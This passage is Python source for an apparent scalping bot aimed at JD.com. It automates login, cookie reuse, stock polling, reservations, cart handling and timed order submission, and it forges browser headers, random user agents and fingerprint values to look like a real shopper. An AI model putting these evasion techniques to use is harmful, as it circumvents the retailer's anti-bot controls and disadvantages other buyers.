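# --------------------------------------------------------------------------
import requests


def build_cookie_header(sess: requests.Session, domain=None, path=None) -> str:
    """Join matching session cookies into a string usable as a Cookie header."""
    parts = []
    for cookie in sess.cookies:
        # mirror the checks above: cookie.domain must be contained in the given
        # domain string, and cookie.path must match exactly, when provided
        if domain is not None and cookie.domain not in domain:
            continue
        if path is not None and cookie.path != path:
            continue
        parts.append(f'{cookie.name}={cookie.value};')
    return ''.join(parts)


# Hypothetical usage: only send cookies scoped to marathon.jd.com
# sess = requests.session()
# cookie_header = build_cookie_header(sess, domain='marathon.jd.com')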
#!/usr/bin/env python # -*- coding: utf-8 -*- import json import os import pickle import random import re import time from datetime import datetime, timedelta from urllib import parse import requests from bs4 import BeautifulSoup import CustomBrowser import address_util from config import global_config from exception import AsstException from log import logger from messenger import Messenger from socketclient import SocketClient, util from socketclient.utils import http_util from socketclient.utils.http import cookie_util from timer import Timer from util import ( DEFAULT_TIMEOUT, DEFAULT_USER_AGENT, check_login, deprecated, encrypt_pwd, encrypt_payment_pwd, get_tag_value, get_random_useragent, open_image, parse_area_id, parse_json, parse_sku_id, parse_items_dict, response_status, save_image, split_area_id, DEFAULT_M_USER_AGENT, nested_parser, nested_inner_parser ) class Assistant(object): def __init__(self, use_new=False): self.config = None self.backend_mod = util.load_backend('gevent') self.sem = self.backend_mod.Semaphore(1) self.event = self.backend_mod.Event() self.socket_client = SocketClient(backend=self.backend_mod) # 功能相关 self.concurrent_gevent_array = [] self.concurrent_count = global_config.concurrent_count self.start_func = None self.chromedriver_path = global_config.get('config', 'chromedriver_path') self.chrome_path = global_config.get('config', 'chrome_path') self.timeout = float(global_config.get('config', 'timeout') or DEFAULT_TIMEOUT) self.send_message = global_config.getboolean('messenger', 'enable') self.messenger = Messenger(global_config.get('messenger', 'sckey')) if self.send_message else None use_random_ua = global_config.getboolean('config', 'random_useragent') if use_new: self.user_agent = DEFAULT_M_USER_AGENT elif not use_random_ua: self.user_agent = DEFAULT_USER_AGENT else: self.user_agent = get_random_useragent() self.use_new = use_new self.br = None self.headers = {'User-Agent': self.user_agent} # 用户相关 if use_new: self.data = dict() self.eid = global_config.get('config', 'eid') self.fp = global_config.get('config', 'fp') self.track_id = global_config.get('config', 'track_id') self.risk_control = global_config.get('config', 'risk_control') self.letterMap = ["Z", "A", "B", "C", "D", "E", "F", "G", "H", "I"] self.area_id = None self.item_zzz = dict() self.item_url_param = dict() self.item_cat = dict() self.item_vender_ids = dict() # 记录商家id self.param_json = dict() # 记录参数 self.special_attrs = dict() # self.seckill_init_info = dict() # self.seckill_order_data = dict() # self.seckill_url = dict() self.item_requests = [] self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.username = '' self.nick_name = '' self.is_login = False self.sess = requests.session() self.cookies_str = None # 请求信息 self.request_info = dict() try: self._load_cookies() except Exception: pass # 已登录则刷新cookies if self.is_login: self.nick_name = self.get_user_info() self._save_cookies() def init_browser(self, headless=True): br = self.br = CustomBrowser.CustomBrowser(self.user_agent, self.chromedriver_path, self.chrome_path, headless) count = 0 # 启动浏览器 while True: try: br.openUrl('chrome://version/') except Exception as e: logger.error(e) logger.error(f'无法初始化浏览器cookies,' 
f'请检查config.ini文件中chromedriver_path与chrome_path的配置 或 检查网络代理是否关闭,开启代理会导致浏览器初始化失败') if count > 3: if br: br.quit() logger.error('初始化浏览器cookies失败!' '请检查config.ini文件中chromedriver_path与chrome_path的配置 或 检查网络代理是否关闭,开启代理会导致浏览器初始化失败!') exit(-1) else: break count += 1 logger.info('初始化下单参数失败!开始第 %s 次重试', count) return br @property def seckill_url(self): return self.item_requests[0] @property def is_request_seckill_url(self): return self.item_requests[1] @property def seckill_init_info(self): return self.item_requests[2] @property def seckill_order_data(self): return self.item_requests[3] @property def is_seckill_checkout_page(self): return self.item_requests[4] @property def is_add_cart_request(self): return self.item_requests[5] @property def is_get_checkout_page(self): return self.item_requests[6] @property def get_submit_page_data(self): return self.item_requests[7] @property def get_promiseUuid(self): return self.item_requests[8] @property def get_submit_data(self): return self.item_requests[9] @property def get_submit_referer(self): return self.item_requests[10] def _load_cookies(self): cookies_file = '' for name in os.listdir('../cookies'): if name.endswith('.cookies'): cookies_file = '../cookies/{0}'.format(name) break with open(cookies_file, 'rb') as f: local_cookies = pickle.load(f) self.sess.cookies.update(local_cookies) self.is_login = self._validate_cookies() def _save_cookies(self): cookies_file = '../cookies/{0}.cookies'.format(self.nick_name) directory = os.path.dirname(cookies_file) if not os.path.exists(directory): os.makedirs(directory) with open(cookies_file, 'wb') as f: pickle.dump(self.sess.cookies, f) def _validate_cookies(self): """验证cookies是否有效(是否登陆) 通过访问用户订单列表页进行判断:若未登录,将会重定向到登陆页面。 :return: cookies是否有效 True/False """ if self.use_new: url = 'https://wq.jd.com/user/info/GetUserAllPinInfo' # url = 'https://home.m.jd.com/myJd/home.action' # url = 'https://home.m.jd.com/userinfom/QueryUserInfoM' params = { 'sceneval': 2, 'g_login_type': 1, 'callback': 'userInfoCallBack', 'g_ty': 'ls', '_': str(int(time.time() * 1000)) } try: resp = self.sess.get(url=url, params=params, headers={'dnt': '1', 'referer': 'https://wqs.jd.com/', 'sec-fetch-dest': 'script', 'sec-fetch-mode': 'no-cors', 'sec-fetch-site': 'same-site', 'user-agent': self.user_agent}, allow_redirects=False) if resp.status_code == requests.codes.OK: html = resp.text if html and 'pin' in html: match = re.search(r'^try\{userInfoCallBack\((.*)\);\}catch\(e\)\{\}$', html) if match: json_str = match.group(1) if json_str: json_dict = json.loads(json_str) self.nick_name = json_dict['userdata']['renderJDDate'][0]['msg']['nickname'] return True except Exception as e: logger.error(e) self.sess = requests.session() return False else: url = 'https://order.jd.com/center/list.action' # payload = { # 'rid': str(int(time.time() * 1000)), # } try: resp = self.sess.get(url=url, headers={'dnt': '1', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'none', 'upgrade-insecure-requests': '1', 'user-agent': self.user_agent}, allow_redirects=False) if resp.status_code == requests.codes.OK: return True except Exception as e: logger.error(e) self.sess = requests.session() return False @deprecated def _need_auth_code(self, username): url = 'https://passport.jd.com/uc/showAuthCode' data = { 'loginName': username, } payload = { 'version': 2015, 'r': random.random(), } resp = self.sess.post(url, params=payload, data=data, headers=self.headers) if not response_status(resp): logger.error('获取是否需要验证码失败') return False resp_json = 
json.loads(resp.text[1:-1]) # ({"verifycode":true}) return resp_json['verifycode'] @deprecated def _get_auth_code(self, uuid): image_file = os.path.join(os.getcwd(), 'jd_authcode.jpg') url = 'https://authcode.jd.com/verify/image' payload = { 'a': 1, 'acid': uuid, 'uid': uuid, 'yys': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/uc/login', } resp = self.sess.get(url, params=payload, headers=headers) if not response_status(resp): logger.error('获取验证码失败') return '' save_image(resp, image_file) open_image(image_file) return input('验证码:') def _get_login_page(self): url = "https://passport.jd.com/new/login.aspx" page = self.sess.get(url, headers=self.headers) return page @deprecated def _get_login_data(self): page = self._get_login_page() soup = BeautifulSoup(page.text, "html.parser") input_list = soup.select('.form input') # eid & fp are generated by local javascript code according to browser environment return { 'sa_token': input_list[0]['value'], 'uuid': input_list[1]['value'], '_t': input_list[4]['value'], 'loginType': input_list[5]['value'], 'pubKey': input_list[7]['value'], 'eid': self.eid, 'fp': self.fp, } @deprecated def login_by_username(self): if self.is_login: logger.info('登录成功') return True username = input('账号:') password = input('密码:') if (not username) or (not password): logger.error('用户名或密码不能为空') return False self.username = username data = self._get_login_data() uuid = data['uuid'] auth_code = '' if self._need_auth_code(username): logger.info('本次登录需要验证码') auth_code = self._get_auth_code(uuid) else: logger.info('本次登录不需要验证码') login_url = "https://passport.jd.com/uc/loginService" payload = { 'uuid': uuid, 'version': 2015, 'r': random.random(), } data['authcode'] = auth_code data['loginname'] = username data['nloginpwd'] = encrypt_pwd(password) headers = { 'User-Agent': self.user_agent, 'Origin': 'https://passport.jd.com', } resp = self.sess.post(url=login_url, data=data, headers=headers, params=payload) if not response_status(resp): logger.error('登录失败') return False if not self._get_login_result(resp): return False # login success logger.info('登录成功') self.nick_name = self.get_user_info() self._save_cookies() self.is_login = True return True @deprecated def _get_login_result(self, resp): resp_json = parse_json(resp.text) error_msg = '' if 'success' in resp_json: # {"success":"http://www.jd.com"} return True elif 'emptyAuthcode' in resp_json: # {'_t': '_t', 'emptyAuthcode': '请输入验证码'} # {'_t': '_t', 'emptyAuthcode': '验证码不正确或验证码已过期'} error_msg = resp_json['emptyAuthcode'] elif 'username' in resp_json: # {'_t': '_t', 'username': '账户名不存在,请重新输入'} # {'username': '服务器繁忙,请稍后再试', 'venture': 'xxxx', 'p': 'xxxx', 'ventureRet': 'http://www.jd.com/', '_t': '_t'} if resp_json['username'] == '服务器繁忙,请稍后再试': error_msg = resp_json['username'] + '(预计账户存在风险,需短信激活)' else: error_msg = resp_json['username'] elif 'pwd' in resp_json: # {'pwd': '账户名与密码不匹配,请重新输入', '_t': '_t'} error_msg = resp_json['pwd'] else: error_msg = resp_json logger.error(error_msg) return False def _get_QRcode(self): url = 'https://qr.m.jd.com/show' payload = { 'appid': 133, 'size': 147, 't': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/', } resp = self.sess.get(url=url, headers=headers, params=payload) if not response_status(resp): logger.info('获取二维码失败') return False QRCode_file = '../QRcode.png' save_image(resp, QRCode_file) logger.info('二维码获取成功,请打开京东APP扫描') open_image(QRCode_file) return True def 
_get_QRcode_ticket(self): url = 'https://qr.m.jd.com/check' payload = { 'appid': '133', 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'token': self.sess.cookies.get('wlfstk_smdl'), '_': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/', } resp = self.sess.get(url=url, headers=headers, params=payload) if not response_status(resp): logger.error('获取二维码扫描结果异常') return False resp_json = parse_json(resp.text) if resp_json['code'] != 200: logger.info('Code: %s, Message: %s', resp_json['code'], resp_json['msg']) return None else: logger.info('已完成手机客户端确认') return resp_json['ticket'] def _validate_QRcode_ticket(self, ticket): url = 'https://passport.jd.com/uc/qrCodeTicketValidation' headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/uc/login?ltype=logout', } resp = self.sess.get(url=url, headers=headers, params={'t': ticket}) if not response_status(resp): return False resp_json = json.loads(resp.text) if resp_json['returnCode'] == 0: return True else: logger.info(resp_json) return False def login_by_QRcode(self): """二维码登陆 :return: """ br = self.init_browser() domain = '.jd.com' br.openUrl(f'https://www{domain}') br.set_cookies(self.sess.cookies, domain) if self.is_login: logger.info('登录成功') else: self._get_login_page() # download QR code if not self._get_QRcode(): raise AsstException('二维码下载失败') # get QR code ticket ticket = None retry_times = 85 for _ in range(retry_times): ticket = self._get_QRcode_ticket() if ticket: break time.sleep(2) else: raise AsstException('二维码过期,请重新获取扫描') # validate QR code ticket if not self._validate_QRcode_ticket(ticket): raise AsstException('二维码信息校验失败') logger.info('二维码登录成功') self.is_login = True self.nick_name = self.get_user_info() self._save_cookies() # 获取下单必须参数 self.init_order_request_info() def login_by_browser(self): """浏览器登录 :return: """ br = self.init_browser(False) br.client.set_window_size(375, 812) domain = '.m.jd.com' # br.openUrl(f'https://plogin{domain}/login/login') br.openUrl(f'https://plogin{domain}/login/login') # br.openUrl(f'https://passport{domain}/new/login.aspx') br.set_cookies(self.sess.cookies, domain) if self.is_login: # br.openUrl(f'https://m.jd.com/') logger.info('登录成功') else: retry_count = 60 for _ in range(retry_count): pt_key = br.client.get_cookie('pt_key') if pt_key: break time.sleep(2) else: br.quit() raise AsstException('登录时间过长,请重新启动') cookies = br.client.get_cookies() for cookie in cookies: if 'expiry' in cookie: expires = cookie['expiry'] else: expires = None self.sess.cookies.set(cookie['name'], cookie['value'] , domain=cookie['domain'], secure=cookie['secure'], expires=expires) if not self._validate_cookies(): raise AsstException('浏览器登录校验失败') logger.info('浏览器登录成功') self.is_login = True self.nick_name = self.get_user_info() self._save_cookies() # 获取下单必须参数 self.init_order_request_info() def _get_reserve_url(self, sku_id): url = 'https://yushou.jd.com/youshouinfo.action' payload = { 'callback': 'fetchJSON', 'sku': sku_id, } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } resp = self.sess.get(url=url, params=payload, headers=headers) resp_json = parse_json(resp.text) # {"type":"1","hasAddress":false,"riskCheck":"0","flag":false,"num":941723,"stime":"2018-10-12 12:40:00","plusEtime":"","qiangEtime":"","showPromoPrice":"0","qiangStime":"","state":2,"sku":100000287121,"info":"\u9884\u7ea6\u8fdb\u884c\u4e2d","isJ":0,"address":"","d":48824,"hidePrice":"0","yueEtime":"2018-10-19 
15:01:00","plusStime":"","isBefore":0,"url":"//yushou.jd.com/toYuyue.action?sku=100000287121&key=237af0174f1cffffd227a2f98481a338","etime":"2018-10-19 15:01:00","plusD":48824,"category":"4","plusType":0,"yueStime":"2018-10-12 12:40:00"}; reserve_url = resp_json.get('url') return 'https:' + reserve_url if reserve_url else None @check_login def make_reserve(self, sku_id): """商品预约 :param sku_id: 商品id :return: """ reserve_url = self._get_reserve_url(sku_id) if not reserve_url: logger.error('%s 非预约商品', sku_id) return headers = { 'User-Agent': self.user_agent, 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } resp = self.sess.get(url=reserve_url, headers=headers) soup = BeautifulSoup(resp.text, "html.parser") reserve_result = soup.find('p', {'class': 'bd-right-result'}).text.strip(' \t\r\n') # 预约成功,已获得抢购资格 / 您已成功预约过了,无需重复预约 logger.info(reserve_result) @check_login def new_reserve(self, sku_id): """商品预约 :param sku_id: 商品id :return: """ try: page_url = 'https://wqs.jd.com/item/yuyue_item.shtml' page_payload = { 'sceneval': '2', 'buyNum': '2', 'sku': sku_id, 'isdraw': '', 'activeid': '', 'activetype': '', 'ybServiceId': '', 'homeServiceId': '', 'ycServiceId': '', 'jxsid': str(int(time.time() * 1000)) + str(random.random())[2:7] } page_headers = { 'dnt': '1', 'referer': 'https://item.m.jd.com/', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'same-site', 'sec-fetch-user': '?1', 'upgrade-insecure-requests': '1', 'User-Agent': self.user_agent } page_resp = self.sess.get(url=page_url, params=page_payload, headers=page_headers) page_html = page_resp.text if not page_html: logger.error('商品 %s 预约页面加载失败', sku_id) yuyue_url = 'https://wq.jd.com/bases/yuyue/item' yuyue_payload = { 'callback': f'subscribeItemCB{self.letterMap[1]}', 'dataType': '1', 'skuId': sku_id, 'sceneval': '2' } yuyue_headers = { 'dnt': '1', 'referer': 'https://wqs.jd.com/', 'sec-fetch-dest': 'script', 'sec-fetch-mode': 'no-cors', 'sec-fetch-site': 'same-site', # 'sec-fetch-user': '?1', # 'upgrade-insecure-requests': '1', 'User-Agent': self.user_agent } yuyue_resp = self.sess.get(url=yuyue_url, params=yuyue_payload, headers=yuyue_headers) yuyue_json = yuyue_resp.text if yuyue_json: if '"replyMsg":"预约成功"' in yuyue_json: logger.info("商品 %s 预约成功", sku_id) return True elif 'replyMsg: "您已经成功预约,不需重复预约"' in yuyue_json: logger.info("商品 %s 已经预约", sku_id) return True logger.error('响应数据:%s', yuyue_json) except Exception as e: logger.error(e) logger.error('商品 %s 预约失败,请手动预约', sku_id) return False @check_login def get_user_info(self): """获取用户信息 :return: 用户名 """ if self.use_new: return self.nick_name else: url = 'https://passport.jd.com/user/petName/getUserInfoForMiniJd.action' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), '_': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://order.jd.com/center/list.action', } try: resp = self.sess.get(url=url, params=payload, headers=headers) resp_json = parse_json(resp.text) # many user info are included in response, now return nick name in it # jQuery2381773({"imgUrl":"//storage.360buyimg.com/i.imageUpload/xxx.jpg","lastLoginTime":"","nickName":"xxx","plusStatus":"0","realName":"xxx","userLevel":x,"userScoreVO":{"accountScore":xx,"activityScore":xx,"consumptionScore":xxxxx,"default":false,"financeScore":xxx,"pin":"xxx","riskScore":x,"totalScore":xxxxx}}) return resp_json.get('nickName') or 'jd' except Exception: return 'jd' def new_get_item_detail_page(self, sku_id): """访问商品详情页 :param sku_id: 商品id 
:return: 响应 """ url = 'https://item.m.jd.com/product/{}.html'.format(sku_id) headers = self.headers.copy() headers['dnt'] = '1' headers['sec-fetch-user'] = '?1' headers['sec-fetch-site'] = 'none' headers['sec-fetch-mode'] = 'navigate' headers['sec-fetch-dest'] = 'document' headers['upgrade-insecure-requests'] = '1' page = self.sess.get(url=url, headers=headers) return page def _get_item_detail_page(self, sku_id): """访问商品详情页 :param sku_id: 商品id :return: 响应 """ url = 'https://item.jd.com/{}.html'.format(sku_id) page = requests.get(url=url, headers=self.headers) return page def get_single_item_stock(self, sku_id, num, area): """获取单个商品库存状态 :param sku_id: 商品id :param num: 商品数量 :param area: 地区id :return: 商品是否有货 True/False """ area_id = parse_area_id(area) cat = self.item_cat.get(sku_id) vender_id = self.item_vender_ids.get(sku_id) if not cat: page = self._get_item_detail_page(sku_id) match = re.search(r'cat: \[(.*?)\]', page.text) cat = match.group(1) self.item_cat[sku_id] = cat match = re.search(r'venderId:(\d*?),', page.text) vender_id = match.group(1) self.item_vender_ids[sku_id] = vender_id url = 'https://c0.3.cn/stock' payload = { 'skuId': sku_id, 'buyNum': num, 'area': area_id, 'ch': 1, '_': str(int(time.time() * 1000)), 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'extraParam': '{"originid":"1"}', # get error stock state without this param 'cat': cat, # get 403 Forbidden without this param (obtained from the detail page) 'venderId': vender_id # return seller information with this param (can't be ignored) } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } resp_text = '' try: resp_text = requests.get(url=url, params=payload, headers=headers, timeout=self.timeout).text resp_json = parse_json(resp_text) stock_info = resp_json.get('stock') sku_state = stock_info.get('skuState') # 商品是否上架 stock_state = stock_info.get('StockState') # 商品库存状态:33 -- 现货 0,34 -- 无货 36 -- 采购中 40 -- 可配货 return sku_state == 1 and stock_state in (33, 40) except requests.exceptions.Timeout: logger.error('查询 %s 库存信息超时(%ss)', sku_id, self.timeout) return False except requests.exceptions.RequestException as request_exception: logger.error('查询 %s 库存信息发生网络请求异常:%s', sku_id, request_exception) return False except Exception as e: logger.error('查询 %s 库存信息发生异常, resp: %s, exception: %s', sku_id, resp_text, e) return False @check_login def get_multi_item_stock(self, sku_ids, area): """获取多个商品库存状态(旧) 该方法需要登陆才能调用,用于同时查询多个商品的库存。 京东查询接口返回每种商品的状态:有货/无货。当所有商品都有货,返回True;否则,返回False。 :param sku_ids: 多个商品的id。可以传入中间用英文逗号的分割字符串,如"123,456" :param area: 地区id :return: 多个商品是否同时有货 True/False """ items_dict = parse_sku_id(sku_ids=sku_ids) area_id_list = split_area_id(area) url = 'https://trade.jd.com/api/v1/batch/stock' headers = { 'User-Agent': self.user_agent, 'Origin': 'https://trade.jd.com', 'Content-Type': 'application/json; charset=UTF-8', 'Referer': 'https://trade.jd.com/shopping/order/getOrderInfo.action?rid=' + str(int(time.time() * 1000)), } data = { "areaRequest": { "provinceId": area_id_list[0], "cityId": area_id_list[1], "countyId": area_id_list[2], "townId": area_id_list[3] }, "skuNumList": [] } for sku_id, count in items_dict.items(): data['skuNumList'].append({ "skuId": sku_id, "num": count }) # convert to string data = json.dumps(data) try: resp = self.sess.post(url=url, headers=headers, data=data, timeout=self.timeout) except requests.exceptions.Timeout: logger.error('查询 %s 库存信息超时(%ss)', list(items_dict.keys()), self.timeout) return False except 
requests.exceptions.RequestException as e: raise AsstException('查询 %s 库存信息异常:%s' % (list(items_dict.keys()), e)) resp_json = parse_json(resp.text) result = resp_json.get('result') stock = True for sku_id in result: status = result.get(sku_id).get('status') if '无货' in status: stock = False break return stock def get_multi_item_stock_new(self, sku_ids, area): """获取多个商品库存状态(新) 当所有商品都有货,返回True;否则,返回False。 :param sku_ids: 多个商品的id。可以传入中间用英文逗号的分割字符串,如"123,456" :param area: 地区id :return: 多个商品是否同时有货 True/False """ items_dict = parse_sku_id(sku_ids=sku_ids) area_id = parse_area_id(area=area) url = 'https://c0.3.cn/stocks' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'type': 'getstocks', 'skuIds': ','.join(items_dict.keys()), 'area': area_id, '_': str(int(time.time() * 1000)) } headers = { 'User-Agent': self.user_agent } resp_text = '' try: resp_text = requests.get(url=url, params=payload, headers=headers, timeout=self.timeout).text stock = True for sku_id, info in parse_json(resp_text).items(): sku_state = info.get('skuState') # 商品是否上架 stock_state = info.get('StockState') # 商品库存状态 if sku_state == 1 and stock_state in (33, 40): continue else: stock = False break return stock except requests.exceptions.Timeout: logger.error('查询 %s 库存信息超时(%ss)', list(items_dict.keys()), self.timeout) return False except requests.exceptions.RequestException as request_exception: logger.error('查询 %s 库存信息发生网络请求异常:%s', list(items_dict.keys()), request_exception) return False except Exception as e: logger.error('查询 %s 库存信息发生异常, resp: %s, exception: %s', list(items_dict.keys()), resp_text, e) return False def _if_item_removed(self, sku_id): """判断商品是否下架 :param sku_id: 商品id :return: 商品是否下架 True/False """ detail_page = self._get_item_detail_page(sku_id=sku_id) return '该商品已下柜' in detail_page.text @check_login def if_item_can_be_ordered(self, sku_ids, area): """判断商品是否能下单 :param sku_ids: 商品id,多个商品id中间使用英文逗号进行分割 :param area: 地址id :return: 商品是否能下单 True/False """ items_dict = parse_sku_id(sku_ids=sku_ids) area_id = parse_area_id(area) # 判断商品是否能下单 if len(items_dict) > 1: return self.get_multi_item_stock_new(sku_ids=items_dict, area=area_id) sku_id, count = list(items_dict.items())[0] return self.get_single_item_stock(sku_id=sku_id, num=count, area=area_id) def get_item_price(self, sku_id): """获取商品价格 :param sku_id: 商品id :return: 价格 """ url = 'http://p.3.cn/prices/mgets' payload = { 'type': 1, 'pduid': int(time.time() * 1000), 'skuIds': 'J_' + sku_id, } resp = self.sess.get(url=url, params=payload) return parse_json(resp.text).get('p') @check_login def add_item_to_cart(self, sku_ids): """添加商品到购物车 重要: 1.商品添加到购物车后将会自动被勾选✓中。 2.在提交订单时会对勾选的商品进行结算。 3.部分商品(如预售、下架等)无法添加到购物车 京东购物车可容纳的最大商品种数约为118-120种,超过数量会加入购物车失败。 :param sku_ids: 商品id,格式:"123" 或 "123,456" 或 "123:1,456:2"。若不配置数量,默认为1个。 :return: """ add_cart_request = self.request_info['add_cart_request'] for sku_id, count in parse_sku_id(sku_ids=sku_ids).items(): payload = { 'pid': sku_id, 'pcount': count, 'ptype': 1, } add_cart_request(payload) @check_login def clear_cart(self): """清空购物车 包括两个请求: 1.选中购物车中所有的商品 2.批量删除 :return: 清空购物车结果 True/False """ # 1.select all items 2.batch remove items select_url = 'https://cart.jd.com/selectAllItem.action' remove_url = 'https://cart.jd.com/batchRemoveSkusFromCart.action' data = { 't': 0, 'outSkus': '', 'random': random.random(), } try: select_resp = self.sess.post(url=select_url, data=data) time.sleep(2) remove_resp = self.sess.post(url=remove_url, data=data) if (not response_status(select_resp)) or (not 
response_status(remove_resp)): logger.error('购物车清空失败') return False logger.info('购物车清空成功') return True except Exception as e: logger.error(e) return False @check_login def get_cart_detail(self): """获取购物车商品详情 :return: 购物车商品信息 dict """ url = 'https://cart.jd.com/cart.action' resp = self.sess.get(url) soup = BeautifulSoup(resp.text, "html.parser") cart_detail = dict() for item in soup.find_all(class_='item-item'): try: sku_id = item['skuid'] # 商品id # 例如:['increment', '8888', '100001071956', '1', '13', '0', '50067652554'] # ['increment', '8888', '100002404322', '2', '1', '0'] item_attr_list = item.find(class_='increment')['id'].split('_') p_type = item_attr_list[4] promo_id = target_id = item_attr_list[-1] if len(item_attr_list) == 7 else 0 cart_detail[sku_id] = { 'name': get_tag_value(item.select('div.p-name a')), # 商品名称 'verder_id': item['venderid'], # 商家id 'count': int(item['num']), # 数量 'unit_price': get_tag_value(item.select('div.p-price strong'))[1:], # 单价 'total_price': get_tag_value(item.select('div.p-sum strong'))[1:], # 总价 'is_selected': 'item-selected' in item['class'], # 商品是否被勾选 'p_type': p_type, 'target_id': target_id, 'promo_id': promo_id } except Exception as e: logger.error("某商品在购物车中的信息无法解析,报错信息: %s,该商品自动忽略。 %s", e, item) logger.info('购物车信息:%s', cart_detail) return cart_detail def _cancel_select_all_cart_item(self): """取消勾选购物车中的所有商品 :return: 取消勾选结果 True/False """ url = "https://cart.jd.com/cancelAllItem.action" data = { 't': 0, 'outSkus': '', 'random': random.random() # 'locationId' can be ignored } resp = self.sess.post(url, data=data) return response_status(resp) def _change_item_num_in_cart(self, sku_id, vender_id, num, p_type, target_id, promo_id): """修改购物车商品的数量 修改购物车中商品数量后,该商品将会被自动勾选上。 :param sku_id: 商品id :param vender_id: 商家id :param num: 目标数量 :param p_type: 商品类型(可能) :param target_id: 参数用途未知,可能是用户判断优惠 :param promo_id: 参数用途未知,可能是用户判断优惠 :return: 商品数量修改结果 True/False """ url = "https://cart.jd.com/changeNum.action" data = { 't': 0, 'venderId': vender_id, 'pid': sku_id, 'pcount': num, 'ptype': p_type, 'targetId': target_id, 'promoID': promo_id, 'outSkus': '', 'random': random.random(), # 'locationId' } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://cart.jd.com/cart', } resp = self.sess.post(url, data=data, headers=headers) return json.loads(resp.text)['sortedWebCartResult']['achieveSevenState'] == 2 def _add_or_change_cart_item(self, cart, sku_id, count): """添加商品到购物车,或修改购物车中商品数量 如果购物车中存在该商品,会修改该商品的数量并勾选;否则,会添加该商品到购物车中并勾选。 :param cart: 购物车信息 dict :param sku_id: 商品id :param count: 商品数量 :return: 运行结果 True/False """ if sku_id in cart: logger.info('%s 已在购物车中,调整数量为 %s', sku_id, count) cart_item = cart.get(sku_id) return self._change_item_num_in_cart( sku_id=sku_id, vender_id=cart_item.get('vender_id'), num=count, p_type=cart_item.get('p_type'), target_id=cart_item.get('target_id'), promo_id=cart_item.get('promo_id') ) else: logger.info('%s 不在购物车中,开始加入购物车,数量 %s', sku_id, count) return self.add_item_to_cart(sku_ids={sku_id: count}) @check_login def get_checkout_page_detail(self): """获取订单结算页面信息 该方法会返回订单结算页面的详细信息:商品名称、价格、数量、库存状态等。 :return: 结算信息 dict """ get_checkout_page_request = self.request_info['get_checkout_page_request'] payload = { 'rid': str(int(time.time() * 1000)), } get_checkout_page_request(payload) def _save_invoice(self): """下单第三方商品时如果未设置发票,将从电子发票切换为普通发票 http://jos.jd.com/api/complexTemplate.htm?webPamer=invoice&groupName=%E5%BC%80%E6%99%AE%E5%8B%92%E5%85%A5%E9%A9%BB%E6%A8%A1%E5%BC%8FAPI&id=566&restName=jd.kepler.trade.submit&isMulti=true :return: """ url = 
'https://trade.jd.com/shopping/dynamic/invoice/saveInvoice.action' data = { "invoiceParam.selectedInvoiceType": 1, "invoiceParam.companyName": "个人", "invoiceParam.invoicePutType": 0, "invoiceParam.selectInvoiceTitle": 4, "invoiceParam.selectBookInvoiceContent": "", "invoiceParam.selectNormalInvoiceContent": 1, "invoiceParam.vatCompanyName": "", "invoiceParam.code": "", "invoiceParam.regAddr": "", "invoiceParam.regPhone": "", "invoiceParam.regBank": "", "invoiceParam.regBankAccount": "", "invoiceParam.hasCommon": "true", "invoiceParam.hasBook": "false", "invoiceParam.consigneeName": "", "invoiceParam.consigneePhone": "", "invoiceParam.consigneeAddress": "", "invoiceParam.consigneeProvince": "请选择:", "invoiceParam.consigneeProvinceId": "NaN", "invoiceParam.consigneeCity": "请选择", "invoiceParam.consigneeCityId": "NaN", "invoiceParam.consigneeCounty": "请选择", "invoiceParam.consigneeCountyId": "NaN", "invoiceParam.consigneeTown": "请选择", "invoiceParam.consigneeTownId": 0, "invoiceParam.sendSeparate": "false", "invoiceParam.usualInvoiceId": "", "invoiceParam.selectElectroTitle": 4, "invoiceParam.electroCompanyName": "undefined", "invoiceParam.electroInvoiceEmail": "", "invoiceParam.electroInvoicePhone": "", "invokeInvoiceBasicService": "true", "invoice_ceshi1": "", "invoiceParam.showInvoiceSeparate": "false", "invoiceParam.invoiceSeparateSwitch": 1, "invoiceParam.invoiceCode": "", "invoiceParam.saveInvoiceFlag": 1 } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://trade.jd.com/shopping/dynamic/invoice/saveInvoice.action', } self.sess.post(url=url, data=data, headers=headers) @check_login def submit_order(self): """提交订单 重要: 1.该方法只适用于普通商品的提交订单(即可以加入购物车,然后结算提交订单的商品) 2.提交订单时,会对购物车中勾选✓的商品进行结算(如果勾选了多个商品,将会提交成一个订单) :return: True/False 订单提交结果 """ submit_order_request = self.request_info['submit_order_request'] return submit_order_request() @check_login def submit_order_with_retry(self, retry=3, interval=4): """提交订单,并且带有重试功能 :param retry: 重试次数 :param interval: 重试间隔 :return: 订单提交结果 True/False """ for i in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', i, retry) self.get_checkout_page_detail() if self.submit_order(): logger.info('第%s次提交订单成功', i) return True else: if i < retry: logger.info('第%s次提交失败,%ss后重试', i, interval) time.sleep(interval) else: logger.info('重试提交%s次结束', retry) return False @check_login def submit_order_by_time(self, buy_time, retry=4, interval=5): """定时提交商品订单 重要:该方法只适用于普通商品的提交订单,事先需要先将商品加入购物车并勾选✓。 :param buy_time: 下单时间,例如:'2018-09-28 22:45:50.000' :param retry: 